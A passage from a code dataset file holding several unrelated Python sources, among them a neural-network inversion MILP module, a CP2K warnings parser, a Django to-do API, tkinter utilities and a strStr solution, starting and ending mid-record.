params=queryString, json=data)\n\n if response.status_code != 200:\n cbpi.notify(\"Brewfather Error\", \"Received unsuccessful response. Ensure API Id is correct. HTTP Error Code: \" + str(response.status_code), type=\"danger\", timeout=None)\n\n except BaseException as error:\n cbpi.notify(\"Brewfather Error\", \"Unable to send message.\" + str(error), type=\"danger\", timeout=None)\n pass\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"514772218","text":"import os\nimport tensorflow as tf\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=config)\nimport sys\n\nsys.path.insert(0, os.getcwd())\nimport skimage.io\n\nfrom configs.vip import ParsingRCNNModelConfig\n\nfrom models.parsing_rcnn_model import PARSING_RCNN\nfrom utils import visualize\nfrom time import time\n\nt0 = time()\n# Root directory of the project\nROOT_DIR = os.getcwd()\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"outputs\")\n\n# Path to trained weights file\n# Download this file and place in the root of your \n# project (See README file for details)\nDATASET_DIR = \"/home/sk49/workspace/dataset/VIP\"\nMODEL_PATH = \"./outputs/vip_singleframe_20181229a/checkpoints/parsing_rcnn_vip_singleframe_20181229a_epoch040.h5\"\n# MODEL_PATH = \"./outputs/vip_singleframe_20181229ma/checkpoints/parsing_rcnn_vip_singleframe_20181229ma_epoch080.h5\"\n# MODEL_PATH = \"./checkpoints/parsing_rcnn.h5\"\n# Directory of images to run detection on\nIMAGE_DIR = DATASET_DIR + \"/Images\"\nIMAGE_LIST = DATASET_DIR + \"/lists/val_id.txt\"\n\nRES_DIR = \"./vis/val_vip_singleframe_20181229a_epoch040\"\n# RES_DIR = \"./vis/val_vip_singleframe\"\nif not os.path.exists(RES_DIR):\n os.makedirs(RES_DIR)\n\n\nclass InferenceConfig(ParsingRCNNModelConfig):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n\nconfig = InferenceConfig()\nconfig.display()\n\n# Create model object in inference mode.\nmodel = PARSING_RCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR)\n\n# Load weights trained on MS-COCO\nmodel.load_weights(MODEL_PATH, by_name=True)\nprint(\"load model\", time() - t0, \"s\")\nc = 0\nrfp = open(IMAGE_LIST, 'r')\nfor line in rfp.readlines():\n line = line.strip()\n c += 1\n print(c, line)\n ind = line.find('/')\n vid = line[:ind]\n image_id = line[ind + 1:]\n video_floder = os.path.join(RES_DIR, vid)\n if not os.path.exists(video_floder):\n os.makedirs(video_floder)\n if os.path.exists(os.path.join(video_floder, 'instance_part', image_id) + '.png'):\n continue\n image = skimage.io.imread(os.path.join(IMAGE_DIR, vid, image_id) + '.jpg')\n # Run detection\n t1 = time()\n results = model.detect([image])\n t2 = time()\n print(\"test one image\", t2 - t1, \"s\")\n\n # Visualize results\n r = results[0]\n visualize.vis_insts(image, video_floder, image_id, r['rois'], r['masks'], r['class_ids'], r['scores'])\n visualize.write_inst_part_result(video_floder, image.shape[0], image.shape[1], image_id, r['rois'], r['masks'],\n r['scores'], r['global_parsing'])\n print(\"visualize results\", time() - t2, \"s\")\n\nprint(\"total\", time() - t0, \"s\")\n","sub_path":"val_parsingrcnn.py","file_name":"val_parsingrcnn.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"15588705","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tf_layers import BatchNormLayer, ConvLayer, ActivationLayer\n\ndef init_filter(d,mi,mo,stride):\n\treturn (np.random.randn(d,d,mi,mo) * np.sqrt(2.0 / (d * d * mi))).astype(np.float32)\n\nclass ConvBlock:\n\n\tdef __init__(self,f_in,fm_sizes,stride=1,d=3,activation=None):\n\t\tassert(len(fm_sizes) == 3)\n\n\t\tif activation is None:\n\t\t\tself.activation = ActivationLayer()\n\t\telse:\n\t\t\tself.activation = activation\n\t\t#main brach\n\t\t#conv->bn->f()--->conv->bn->f()--->conv-->bn\n\t\tself.conv1 = ConvLayer(d,f_in,fm_sizes[0],stride)\n\t\tself.bn1=BatchNormLayer(fm_sizes[0])\n\t\tself.conv2 = ConvLayer(d,fm_sizes[0],fm_sizes[1],stride)\n\t\tself.bn2=BatchNormLayer(fm_sizes[1])\n\t\tself.conv3=ConvLayer(d,fm_sizes[1],fm_sizes[2],stride)\n\t\tself.bn3=BatchNormLayer(fm_sizes[2])\t\t\t\n\n\t\t#skip\n\t\t#Conv-->BN\n\t\tself.convs=ConvLayer(d,f_in,fm_sizes[2],stride)\n\t\tself.bns=BatchNormLayer(fm_sizes[2])\n\n\t\tself.layers = [\n\t\t\tself.conv1,self.bn1, self.activation,\n\t\t\tself.conv2, self.bn2, self.activation,\n\t\t\tself.conv3, self.bn3,\n\t\t\tself.convs, self.bns,\n\t\t]\n\n\tdef forward(self,X,isTrain=True):\n\t\t#main br\n\t\tFX = X\n\t\tfor layer in self.layers[:-2]:\n\t\t\tFX = layer.forward(FX,isTrain)\n\n\t\t#skip\n\t\tSX = self.layers[-2].forward(X=X,isTrain=isTrain)\n\t\tSX = self.layers[-1].forward(X=SX,isTrain=isTrain)\n\n\t\treturn FX + SX\n\n\tdef copyFromKerasLayers(self,layers):\n\t\tself.conv1.copyFromKerasLayers(layers[0])\n\t\tself.bn1.copyFromKerasLayers(layers[1])\n\n\t\tself.conv2.copyFromKerasLayers(layers[3])\n\t\tself.bn2.copyFromKerasLayers(layers[4])\n\n\t\tself.conv3.copyFromKerasLayers(layers[6])\n\t\tself.bn3.copyFromKerasLayers(layers[8])\n\n\t\tself.convs.copyFromKerasLayers(layers[7])\n\t\tself.bns.copyFromKerasLayers(layers[9])\n\n\tdef get_params(self):\n\t\tparams = []\n\t\tfor layer in self.layers:\n\t\t\tparams += layer.get_params()\n\t\treturn params\n\n","sub_path":"wolFikaM/tf_convBlock_resnet.py","file_name":"tf_convBlock_resnet.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"531039885","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis file implements\n - a class to store the architecture of a multilayer perceptron (ANN)\n - functions to initialize vatiables and build a pulp MILP model for\n inverting an ANN of a given architecture\n\nAuthor: Discrete Mathematics Lab,\n Department of Applied Mathematics and Physics,\n Graduate School of Informatics,\n Kyoto University\n\"\"\"\n\n# standard imports\nimport sys\nimport pandas as pd\nimport numpy as np\n\n# import pulp for MILP modeling\nimport pulp\n\n\nclass ANN:\n \"\"\"\n An encapsulating class to conveniently store\n information about a trained neural network\n \"\"\"\n\n def __init__(self, weight_tensor=list(), bias_matrix=list()):\n # prepare a list to store all the nodes\n self.nodes = list()\n # prepare a list to store sets of nodes by layer\n self.layers = list()\n # a dictionary to bind pairs of vertices to weights\n self.weights = dict()\n # a dictionary to bind each vertex to a bias\n self.biases = dict()\n # a dictionary to store a list of the in neighbors\n # for each vertex not in the input layer\n self.in_neighbors = dict()\n\n for l, bias_layer in enumerate(bias_matrix):\n layer_nodes = list()\n for k, bias in enumerate(bias_layer):\n node = (l+1, k+1)\n self.nodes.append(node)\n self.biases[node] = bias\n layer_nodes.append(node)\n self.layers.append(layer_nodes)\n\n \"\"\"\n Store the nodes in lists by layer\n \"\"\"\n for l, layer in enumerate(self.layers):\n try:\n for node in self.layers[l+1]:\n self.in_neighbors[node] = layer\n except IndexError:\n # We are at the last layer that\n # does not have a succeeding layer\n pass\n except ValueError:\n # This should not happen\n print(\"\"\"\n Received Value Error\n in distributing ANN nodes by layers\n \"\"\")\n sys.exit()\n\n \"\"\"\n Store the weights as a dictionary\n of ordered node pairs\n \"\"\"\n for l, weight_matrix in enumerate(weight_tensor):\n for i, weight_row in enumerate(weight_matrix):\n for j, weight in enumerate(weight_row):\n # source node in current layer\n u = (l+1, i+1) # mind the +1 offset in naming\n # target node in next layer\n v = (l+2, j+1)\n self.weights[(u, v)] = weight\n\n def activation(self, x, func=None):\n \"\"\"\n Define an activation function for the ANN\n If no particular function is supplied, then\n ReLU is used by default\n \"\"\"\n if func:\n # This means that some activation function was supplied\n return func(x)\n else:\n # Otherwise, we use ReLU\n return max(0, x)\n\n @property\n def input_layer(self):\n \"\"\"\n Simply return the first layer\n \"\"\"\n return self.layers[0]\n\n @property\n def output_layer(self):\n \"\"\"\n Return the last layer\n \"\"\"\n return self.layers[-1]\n\n @property\n def hidden_layers(self):\n \"\"\"\n Return an iterator of the internal layers,\n i.e. Layers other than index 0 and -1\n \"\"\"\n for l in self.layers[1:-1]:\n yield l\n\n @property\n def non_input_nodes(self):\n \"\"\"\n Return a generator of all the nodes in all\n layers except the first one\n \"\"\"\n for layer in self.layers[1:]:\n for node in layer:\n yield node\n\n def propagate(self, fv):\n \"\"\"\n Predict using trained model\n\n Arguments:\n fv {array_like} -- feature vector (input layer)\n Returns:\n pred_val {scalar object} -- predicted value (output layer)\n\n NOTE\n input layer:\n y[0] = fv\n\n hidden layer and output layer:\n x[i+1] = dot(w[i+1], y[i]) + b[i+1]\n y[i+1] = activation(x[i+1])\n i = 1, 2, ..., num_layer - 1\n \"\"\"\n\n # list of nodes in current layer\n cur_layer = self.input_layer\n\n # vector in current layer {numpy.ndarray}\n vec_y = np.array(fv)\n\n for next_layer in self.layers[1:]:\n # prepare weight matrix {numpy.ndarray}\n weight_matrix = np.array([\n [self.weights[(u, v)] for u in cur_layer]\n for v in next_layer\n ])\n\n # prepare bias vector {numpy.ndarray}\n bias_vector = np.array([\n self.biases[v]\n for v in next_layer\n ])\n \n vec_x = np.dot(weight_matrix, vec_y) + bias_vector\n \n if next_layer == self.output_layer:\n vec_y = np.array([x for x in vec_x])\n else:\n vec_y = np.array([\n self.activation(x)\n for x in vec_x\n ])\n \n # update current layer\n cur_layer = next_layer\n\n return list(vec_y)\n\n\ndef initialize_constants(ann, training_data):\n \"\"\"\n Given a trained ANN and a matrix of training data\n where each row is a single sample,\n calculate the ranges of values that can be passed\n to each node in the ANN\n \"\"\"\n\n # cast the training data as a numpy array\n td = np.array(training_data)\n # Check if the training_data's feature vectors have exactly the same\n # number of elements as nodes in the input layer\n if td.shape[1] != len(ann.input_layer):\n print(\"###############\")\n print(\"\"\"\n Vector length mismatch between training data\n and ANN input layer!\n \"\"\")\n sys.exit()\n # prepare dictionaries to store values\n a_low = dict()\n a_high = dict()\n a = dict()\n b_low = dict()\n b_high = dict()\n b_hat = dict()\n b = dict()\n c = dict()\n z13 = dict()\n # first, calculate b_low, b_high values for the\n # nodes of the input layer\n for node, column in zip(ann.input_layer, td.T):\n b_low[node] = min(column)\n b_high[node] = 1000\n b[node] = (b_low[node], 0, b_high[node])\n\n # calculate the ranges for the remaining layers\n for v in ann.non_input_nodes:\n a_low[v], a_high[v] = 0, 0\n for u in ann.in_neighbors[v]:\n w_uv = ann.weights[(u, v)]\n if w_uv > 0:\n a_low[v] += w_uv*b_low[u]\n a_high[v] += w_uv*b_high[u]\n else:\n a_high[v] += w_uv*b_low[u]\n a_low[v] += w_uv*b_high[u]\n # if ann.biases[v] >= 0:\n # a_high[v] += ann.biases[v]\n # else:\n # a_low[v] += ann.biases[v]\n a_high[v] += ann.biases[v]\n a_low[v] += ann.biases[v]\n\n # zip the a_low, a_high variables into a single triplet\n a[v] = (a_low[v], 0, a_high[v])\n\n b_low[v] = 0\n\n ##################\n if v in ann.output_layer:\n b_low[v] = -1000\n ##################\n\n if a_high[v] > 0:\n b_high[v] = a_high[v]\n else:\n b_high[v] = 0\n # zip the b_low, b_high variables into a single triplet\n b[v] = (b_low[v], 0, b_high[v])\n b_hat[v] = 2*a_high[v] - a_low[v]\n c[v] = (0, 1)\n z13[v] = (1, 0)\n\n # print(v, \" a_high[v] = \", a_high[v], \" a_low[v] = \", a_low[v])\n\n return a, b, b_hat, c, z13\n\n\ndef initialize_lp_variables(ann, a, b, forbidden_node, property_name=\"def\"):\n \"\"\"\n Given a trained ANN,\n initialize variables for each node.\n Dictionaries a and b give the ranges for the variables\n \"\"\"\n low = 0\n high = 2\n\n \"\"\"\n A dictionary to store x_v variable for each node v not in the input layer.\n x_v is real-valued and a[v][low] <= x_v <= a[v][high]\n \"\"\"\n x = {node: pulp.LpVariable(\"ann_x{}_{}\".format(node, property_name),\n a[node][low],\n a[node][high])\n for node in ann.non_input_nodes}\n\n \"\"\"\n A dictionary to store y_v variable for each node v in ann.\n y_v is real-valued and 0 <= y_v <= b[v][high]\n \"\"\"\n y = {node: pulp.LpVariable(\"ann_y{}_{}\".format(node, property_name),\n b[node][low],\n b[node][high])\n for node in ann.nodes if node not in forbidden_node}\n \"\"\"\n A dictionary to store binary z_v variable\n for each node v not in the input layer.\n \"\"\"\n z = {node: pulp.LpVariable(\"ann_z{}_{}\".format(node, property_name), 0, 1, pulp.LpBinary)\n for node in ann.non_input_nodes}\n\n return x, y, z\n\n\ndef build_MILP_ReLU(\n model : pulp.LpProblem,\n ann : ANN, \n variables: tuple, \n constants: tuple, \n target : tuple,\n eps : float,\n forbidden_node,\n property_name = \"def\" \n )-> pulp.LpProblem:\n \"\"\"\n Given matrices of variables and constants,\n construct an MILP model in PuLP according to the\n MILP formulation for ReLU activation functions,\n Akutsu and Nagamochi, 2019\n \"\"\"\n\n if type(target) == int or type(target) == float:\n target = [target, ]\n \"\"\"\n First, check if the last (output) layer of ann\n has the same size as the target data\n \"\"\"\n if len(ann.output_layer) != len(target):\n print(\"\"\"\n Error: The size of the output layer and the\n target data do not match!\n The program will now exit.\n \"\"\")\n sys.exit()\n\n x, y, z2 = variables # unzip the variables\n a, b, b_hat, c, z13 = constants # unzip the constants\n \"\"\"\n For convenience, zip the constants from z13 and variables from z2\n into a single structure\n \"\"\"\n z = dict()\n for node in ann.non_input_nodes:\n z[node] = (z13[node][0], z2[node], z13[node][1])\n\n # Constraint on the activation of ann\n for v in ann.non_input_nodes:\n in_u = ann.in_neighbors[v]\n w_v = [ann.weights[(u, v)] for u in in_u if u not in forbidden_node]\n in_y = [y[u] for u in in_u if u not in forbidden_node]\n\n model += \\\n x[v] == pulp.lpDot(in_y, w_v) + ann.biases[v], \\\n \"Output_node_{}_{}\".format(v, property_name)\n\n if v in ann.output_layer:\n model += y[v] == x[v], \"ReLU_y{}_{}\".format(v, property_name)\n else:\n ###################\n model += \\\n x[v] - a[v][1] <= (a[v][2] - a[v][0]) * z[v][1], \\\n \"ReLU_x{}_ub_{}\".format(v, property_name)\n\n if a[v][2] > 0:\n model += \\\n x[v] - a[v][1] >= (a[v][0] - a[v][2]) * (1 - z[v][1]), \\\n \"ReLU_x{}_lb_{}\".format(v, property_name)\n\n for i in [0, 1]:\n model += \\\n y[v] <= c[v][i] * (x[v] - a[v][i]) + b[v][i] \\\n + b_hat[v] * (1 + z[v][i + 1] - z[v][i]), \\\n \"ReLU_y{}_{}_ub_{}\".format(v, i, property_name)\n\n model += \\\n y[v] >= c[v][i] * (x[v] - a[v][i]) + b[v][i] \\\n - b_hat[v] * (1 + z[v][i + 1] - z[v][i]), \\\n \"ReLU_y{}_{}_lb_{}\".format(v, i, property_name)\n else:\n model += z[v][1] == 0, \"ReLU_x{}_lb_{}\".format(v, property_name)\n model += y[v] == 0, \"ReLU_y{}_{}\".format(v, property_name)\n\n #######################\n\n\n for out_node, tv in zip(ann.output_layer, target):\n #######################\n if tv >= 0:\n model += \\\n y[out_node] >= tv * (1 - eps), \\\n \"lower_bound_target_{}_{}\".format(out_node, property_name)\n\n model += \\\n y[out_node] <= tv * (1 + eps), \\\n \"upper_bound_target_{}_{}\".format(out_node, property_name)\n else:\n model += \\\n y[out_node] >= tv * (1 + eps), \\\n \"lower_bound_target_{}_{}\".format(out_node, property_name)\n\n model += \\\n y[out_node] <= tv * (1 - eps), \\\n \"upper_bound_target_{}_{}\".format(out_node, property_name)\n #######################\n\n # Finally, return the built model\n return model\n\n\ndef line2num(line, numtype=float, sep=\" \"):\n line = line.strip()\n return [numtype(num) for num in line.split(sep)]\n\n\ndef read_trained_ANN(weight_filename, bias_filename):\n \"\"\"\n Given filenames to files that\n contain the values for the weights and biases\n of a trained ANN, read the values form the files,\n contruct an ANN and return it\n \"\"\"\n try:\n with \\\n open(weight_filename, \"r\") as wf, \\\n open(bias_filename, \"r\") as bf:\n layer_sizes = line2num(wf.readline(), int)\n weight_tensor = list()\n for ell in layer_sizes[:-1]:\n weight_matrix = list()\n for _ in range(ell):\n weight_line = wf.readline()\n weight_matrix.append(line2num(weight_line))\n weight_tensor.append(weight_matrix)\n bias_matrix = list()\n \"\"\"\n The input layer has no bias, and\n we define it to be 0\n \"\"\"\n bias_matrix.append([0]*layer_sizes[0])\n for ell in layer_sizes[1:]:\n bias_row = list()\n for _ in range(ell):\n bias_line = bf.readline().strip()\n bias_row.append(float(bias_line))\n bias_matrix.append(bias_row)\n except:\n print(\n \"\"\"\n An error occured when trying to read ANN data from files\n {}\n {}\n Now will terminate\n \"\"\".format(weight_filename, bias_filename))\n sys.exit()\n\n return weight_tensor, bias_matrix\n\n\ndef read_fv_descriptors(training_data_filename):\n \"\"\"\n Read the textual names for the descriptors\n in the feature vector, as the first line from\n the supplied training data file.\n Return a list of these names as strings\n \"\"\"\n try:\n data_frame = pd.read_csv(training_data_filename, sep=\",\")\n except:\n print(\"\"\"\n Error reading the file {}\n with pandas.\n \"\"\".format(training_data_filename))\n sys.exit()\n return list(data_frame.columns)\n\n\ndef read_training_data(training_data_filename):\n \"\"\"\n Given a set of feature vectors as training data,\n return a matrix that contains one feature vector\n per row\n \"\"\"\n try:\n data_frame = pd.read_csv(training_data_filename, sep=\",\")\n except:\n print(\"\"\"\n Error reading the file {}\n with pandas.\n \"\"\".format(training_data_filename))\n sys.exit()\n # print(data_frame.values) # testing\n\n try:\n table = data_frame.values # numpy array\n table = table[:, 1:]\n except:\n print(\"\"\"\n Exception in converting the dataframe\n to a numpy array, file\n {}\n \"\"\".format(training_data_filename))\n sys.exit()\n # Success\n return table \n \ndef get_input_layer_variables(ann, variables, descriptors, forbidden_node):\n \"\"\"\n Given a list of descriptor names and a tuple of\n variables of the MILP_Relu model,\n create and return a dictionary that for each descriptor\n gives the corresponding variable\n \"\"\"\n # unpack the variables\n x, y, z = variables\n # Initialize an empty dictionary\n sol = dict()\n # Iterate over the input layer and the list of descriptors\n # at the same time\n for v, name in zip(ann.input_layer, descriptors):\n if v not in forbidden_node:\n sol[name] = y[v]\n return sol\n\n# Testing\ndef test():\n w, b = read_trained_ANN(\n \"../../test_files/fv4_Kow_weight_5.txt\", \n \"../../test_files/fv4_Kow_bias_5.txt\" )\n \n ann = ANN(w, b)\n # for key, val in ann.in_neighbors.items():\n # print(\"{} : {}\".format(key, val))\n \n training_data = read_training_data(\"../../test_files/fv4_Kow.txt\")\n descriptors = read_fv_descriptors(\"../../test_files/fv4_Kow.txt\")\n # print(descriptors)\n \n consts = initialize_constants(ann, training_data)\n a, b, b_hat, c, z = consts\n # print(\"a:\\n\", a)\n # print(\"b:\\n\", b)\n # print(\"b_hat:\\n\", b_hat)\n # print(\"c:\\n\", c)\n # print(\"z:\\n\", z)\n # znp = np.array(z)\n # print(znp)\n\n LpVars = initialize_lp_variables(ann, a, b)\n # print(LpVars)\n model = pulp.LpProblem(\"Test_A\", pulp.LpMinimize)\n LpModel = build_MILP_ReLU(model, ann, LpVars, consts, 5.0, 0.02)\n # print(LpModel)\n # LpModel.writeLP(\"test_LP_file\")\n\n print(\"Start solving\")\n LpModel.solve()\n print(\"Solved\")\n x, y, z = LpVars\n sol_vars = get_input_layer_variables(ann, LpVars, descriptors)\n \n sol_y = [var.value() for var in sol_vars.values()] \n print(sol_y)\n res = ann.propagate(sol_y)\n print(res)\n \n# test()\n","sub_path":"2L-model/Module_3/files/ann_inverter.py","file_name":"ann_inverter.py","file_ext":"py","file_size_in_byte":17287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"58724565","text":"from typing import Any, Dict, Optional\n\nimport regex as re\n\nfrom .common import BlockMatch\n\nWARNING_MESSAGE_RE = re.compile(\n r\"\"\"\n^\\ \\*{3}\\ WARNING\\ in\\ (?[^:]+):(?P\\d+)\\ ::\\ (?P.+?) \\*{3} \\n\n(\\ \\*{3}\\ (?P.+?) \\*{3} \\n)*\n\"\"\",\n re.VERSION1 | re.VERBOSE | re.MULTILINE,\n)\n\nWARNING_MESSAGE_SIRIUS_RE = re.compile(\n r\"\"\"\n^===\\ (?PWarning|Fatal\\ error)\\ at\\ line\\ (?P\\d+)\\ of\\ file\\ (?P.+?)\\ ===\\n\n(?P.+) \\n\n(?:(?P
        .+) \\n)*\n\"\"\",\n re.VERSION1 | re.VERBOSE | re.MULTILINE,\n)\n\nTOTAL_WARNING_COUNT_RE = re.compile(\n r\"\"\"\n^\\ The\\ number\\ of\\ warnings\\ for\\ this\\ run\\ is\\ :\\s* (?P\\d+)\n\"\"\",\n re.VERBOSE | re.MULTILINE,\n)\n\n\ndef match_warnings(content: str) -> Optional[BlockMatch]:\n result: Dict[str, Any] = {\"warnings\": []}\n spans = []\n\n for wmatch in WARNING_MESSAGE_RE.finditer(content):\n result[\"warnings\"] += [\n {\"filename\": wmatch[\"filename\"], \"line\": int(wmatch[\"line\"]), \"message\": \"\".join(wmatch.captures(\"message\")).rstrip()}\n ]\n spans += wmatch.spans(0)\n\n match = TOTAL_WARNING_COUNT_RE.search(content)\n if match:\n result[\"nwarnings\"] = int(match[\"value\"])\n spans += match.spans(0)\n\n for wmatch in WARNING_MESSAGE_SIRIUS_RE.finditer(content):\n msg = {\"filename\": wmatch[\"filename\"], \"line\": int(wmatch[\"line\"]), \"message\": wmatch[\"message\"].strip()}\n if wmatch.captures(\"details\"):\n msg[\"details\"] = [d.strip() for d in wmatch.captures(\"details\")]\n\n if wmatch[\"type\"] == \"Warning\":\n result[\"warnings\"].append(msg)\n result.setdefault(\"nwarnings\", 0)\n result[\"nwarnings\"] += 1\n elif wmatch[\"type\"] == \"Fatal error\":\n assert \"error\" not in result, \"multiple fatal errors found when parsing SIRIUS warnings\"\n result[\"error\"] = msg\n else:\n raise AssertionError(\"invalid type found when parsing SIRIUS warnings\")\n\n spans += wmatch.spans(0)\n\n return BlockMatch(result, spans)\n","sub_path":"cp2k_output_tools/blocks/warnings.py","file_name":"warnings.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"10998509","text":"#!/usr/bin/env python\n\n__author__ = 'frankojis'\n\nfrom ConfigParser import ConfigParser\nfrom config import CONF_DIR\nfrom os.path import join\nimport defaults\nimport logging\nimport logging.config\n\n\ndef reader(ini, section):\n conffile = join(CONF_DIR, ini + '.ini')\n dsection = ini + \"_\" + section\n _cparser = ConfigParser()\n try:\n _cparser.read(conffile)\n keys = _cparser.options(section)\n if len(keys) > 0:\n params = {}\n for key in keys:\n try:\n params[key] = _cparser.get(section, key)\n except KeyError:\n params[key] = config_default(dsection)[key]\n continue\n return params\n else:\n LOG.debug(\"No overriding params detected\")\n params = config_default(dsection)\n return params\n except IOError as ioe:\n LOG.error(ioe)\n LOG.info(\"Using default configuration parameters\")\n params = config_default(dsection)\n return params\n\n\ndef config_default(section):\n return getattr(defaults, section)\n\n\nLOG_INI = join(CONF_DIR, 'log.ini')\nfrom core.utils import LOGFILE\n\nlogging.config.fileConfig(LOG_INI, defaults={'filename': LOGFILE})\nLOG = logging.getLogger(__name__)","sub_path":"core/utils/configurator.py","file_name":"configurator.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"121016918","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.views import APIView\nfrom .models import Task\nfrom rest_framework.response import Response\nfrom datetime import datetime\n\nclass TaskCreate(APIView):\n def post(self, request):\n user_id = request.data.get('user_id', \"\")\n name = request.data.get('name', \"\")\n end_date = request.data.get('end_date', None)\n\n if end_date:\n end_date = datetime.strptime(end_date, '%Y-%m-%d').date()\n task = Task.objects.create(user_id=user_id, name=name, end_date=end_date)\n\n return Response(dict(msg=\"To-Do 생성 완료\", name=task.name, start_date=task.start_date.strftime('%Y-%m-%d'), end_date=task.end_date))\n\n\nclass TaskSelect(APIView):\n def post(self, request):\n user_id = request.data.get('user_id', \"\")\n\n tasks = Task.objects.filter(user_id=user_id)\n task_list = []\n\n for task in tasks:\n task_list.append(dict(name=task.name, start_date=task.start_date, end_date=task.end_date, state=task.state))\n\n return Response(dict(task=task_list))","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"533161267","text":"from tkinter import *\n\nwindow=Tk()\n\ndef kg2multi():\n kg=float(e1_value.get())\n grams=kg*1000 \n pounds=kg*2.20462\n ounces=kg*35.274\n t1.insert(END,grams)\n t2.insert(END,pounds)\n t3.insert(END,ounces)\n\nl1=Label(window, text=\"Kg\")\nl1.grid(row=0, column=0)\n\ne1_value=StringVar()\ne1=Entry(window, textvariable=e1_value)\ne1.grid(row=0,column=1)\n \nb1=Button(window, text=\"Convert\", command=kg2multi)\n#b1.pack()\nb1.grid(row=0, column=2)#, rowspan=2)\n\nt1=Text(window, height=1, width=20)\nt1.grid(row=1,column=0)\nt2=Text(window, height=1, width=20)\nt2.grid(row=1,column=1)\nt3=Text(window, height=1, width=20)\nt3.grid(row=1,column=2)\n\nwindow.mainloop()","sub_path":"udemy_python_mega_course/ex07.py","file_name":"ex07.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"533179710","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n \n # corner case handling for needle is empty string\n if needle is \"\":\n return 0\n \n\n \n for i in range( len(haystack)-len(needle) + 1 ):\n \n scan_idx = i\n for j in range( len(needle) ):\n \n if haystack[scan_idx] != needle[j]:\n \n break\n else:\n scan_idx += 1\n \n else:\n # if there is a substring in haystack all pass with needle\n # return start index of substring i\n return i\n\n # if no match, return -1 \n return -1\n\n\n\n# M : length of haystack\n# N : length of needle\n\n## Time Complexity: O( M*N )\n#\n# The overhead is the nested loops, outer for loop takes O( M ), while inner one takes O( N )\n\n## Space Complexity: O( 1 )\n#\n# The overhead is some variables for index of looping and substring.\n\n\ndef test_bench():\n\n test_data = [\n (\"hello\", \"ll\"),\n (\"hello\", \"ho\"),\n (\"hello\", \"\"),\n (\"hello\", \"hello\")\n ]\n\n # expected output\n '''\n 2\n -1 \n 0\n 0\n '''\n\n\n for test_pair in test_data:\n\n index_of_match = Solution().strStr( *test_pair )\n\n print( index_of_match )\n\n \n return\n\n\nif __name__ == '__main__':\n\n test_bench()","sub_path":"No_0028_Implement strStr/implement_strStr.py","file_name":"implement_strStr.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"2066681","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom numpy import *\n\n\n\n\n\n\nclass ForwardModelInputs(tk.Frame):\n\n def loadmodel(self,inversepage,n):\n\n file_loc = filedialog.askopenfilename(filetypes=((\"Model File\", \".npz\"), (\"all files\", \"*.*\")),\n defaultextension=\".npz\")\n if file_loc:\n self.forwardmodels_var[n].set(file_loc)\n npzfile = load(file_loc)\n numminerals = npzfile['arr_0'].shape[1]\n inversepage.set_nummin(n,numminerals)\n\n print('\\n')\n\n\n\n\n def __init__(self,parent,mainapp):\n tk.Frame.__init__(self,parent)\n self.config(bg=mainapp.Background1)\n\n #self.grid_columnconfigure(0, weight=1)\n #for i in range(0,5):\n # self.grid_rowconfigure(i, weight=1)\n\n\n tk.Label(self, text='Forward Models', font=mainapp.font_labels,\n bg=mainapp.Background1).grid(row=0, column=1, padx=(4,0), pady=(4,0))\n tk.Frame(self, width=2, bg='black').grid(row=1, column=2, sticky='ns',\n rowspan=5, padx=(3, 3))\n\n\n self.forwardmodels_var=dict()\n self.forwardmodels_lab=dict()\n\n for i in range(0,5):\n self.forwardmodels_var[i]=tk.StringVar(self)\n self.forwardmodels_var[i].set('')\n\n self.forwardmodels_lab[i]=tk.Label(self, textvariable=self.forwardmodels_var[i],\n anchor='w', font=mainapp.font_inputs)\n self.forwardmodels_lab[i].configure(bg='white', relief='sunken', height=1,\n width=25)\n self.forwardmodels_lab[i].grid(row=i+1, column=1, sticky='nsew', padx=(4,0))\n\n self.forwardmodels_lab[i].bind(\"\", lambda event, i=i, h=self.forwardmodels_lab[i]:\n h.configure(bg='#dbdbdb'))\n self.forwardmodels_lab[i].bind(\"\", lambda event, i=i, h=self.forwardmodels_lab[i]:\n h.configure(bg='white'))\n self.forwardmodels_lab[i].bind(\"\", lambda event, i=i: self.loadmodel(parent,i))\n\n\n # Create line earase buttons\n for i in range(0,5):\n self.delline=tk.Label(self, text='X', bg=mainapp.Background1, relief='raised')\n self.delline.grid(row=i+1, column=0, padx=(4,0))\n self.delline.bind(\"\", lambda event, h=self.delline:\n h.configure(bg='red'))\n self.delline.bind(\"\", lambda event, h=self.delline:\n h.configure(bg=mainapp.Background1))\n self.delline.bind(\"\", lambda event, i=i: parent.deleteline(i))\n\n\n print('\\n')\n\n\nclass ErrorFileInputs(tk.Frame):\n\n def 